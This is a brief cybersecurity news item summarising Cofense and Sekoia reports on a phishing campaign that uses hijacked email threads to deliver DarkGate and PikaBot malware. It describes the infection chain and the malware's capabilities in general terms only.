Attack techniques once used to disseminate the dismantled QakBot trojan, also known as QBot and Pinkslipbot, have been leveraged in a new widespread phishing campaign involving the
DarkGate and PikaBot strains aimed at various industries, according to
The Hacker News.
Similar to QakBot, threat actors have been hijacking email threads to deliver phishing messages that include a malicious URL redirecting to a ZIP archive, which features a JavaScript dropper enabling secondary URL communications to execute DarkGate or PikaBot, a report from Cofense showed.
"A successful DarkGate or PikaBot infection could lead to the delivery of advanced crypto mining software, reconnaissance tools, ransomware, or any other malicious file the threat actors wish to install on a victim's machine," said Cofense.
Meanwhile, a separate Sekoia report revealed sophisticated anti-detection mechanisms integrated into DarkGate, which also has PowerShell executing, keystroke logging, and remote host operating capabilities.
"The connection is bidirectional, meaning the attackers can send commands and receive responses in real-time, enabling them to navigate the victim's system, exfiltrate data, or perform other malicious actions," Sekoia added.